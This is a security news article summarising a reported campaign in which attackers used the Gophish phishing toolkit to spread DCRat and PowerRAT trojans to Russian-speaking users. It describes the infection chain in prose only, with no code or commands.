Attackers Are Abusing Gophish to Spread Remote Access Trojans

2024.10.23

According to The Hacker News, an open source phishing toolkit called Gophish is being used by attackers to create DarkCrystal RAT (also known as DCRat) and PowerRAT remote access Trojans, targeting Russian users.

Gophish allows organizations to test their phishing defenses and launch email-based tracking campaigns by leveraging simple templates. But attackers used Gophish to craft phishing emails disguised as Yandex Disk links (“disk-yandex[.]ru”) and HTML pages disguised as VK, the most used social network in Russia.

The attackers have been observed pushing Microsoft Word documents or HTML with embedded JavaScript containing either the DCRat or PowerRAT malware, depending on the initial access vector used. When the victim opens the maldoc and enables macros, a malicious Visual Basic (VB) is executed to extract an HTML application (HTA) file ("UserCache.ini.hta") and a PowerShell loader ("UserCache.ini"). The macro is responsible for configuring a Windows registry key so that the HTA file is automatically launched every time a user logs into their account on the device.

The HTA drops a JavaScript file (“UserCacheHelper.lnk.js”) that is responsible for executing a PowerShell loader. The JavaScript is executed using a legitimate Windows binary named “cscript.exe.”

According to researchers, the PowerShell loader script disguised as an INI file contains PowerRAT's base64-encoded data blob payload, which is decoded and executed in the victim's machine memory.

In addition to performing system reconnaissance, the malware also collects drive serial numbers and connects to a remote server located in Russia to receive further instructions. If no response is received from the server, PowerRAT is equipped with the ability to decode and execute embedded PowerShell scripts. None of the samples analyzed so far contain Base64-encoded strings, indicating that the malware is under active development.

Similarly, an alternative infection chain employing an HTML file that embedded malicious JavaScript triggered a multi-step process leading to the deployment of the DCRat malware.

DCRat is a modular malware that can steal sensitive data, capture screenshots and keystrokes, provide remote control access to infected systems, and cause the download and execution of additional files.

In addition to Russia, malicious activities have also been detected in neighboring Ukraine, Belarus, Kazakhstan, Uzbekistan and Azerbaijan, indicating that users in the entire Russian-speaking region are targeted by attackers.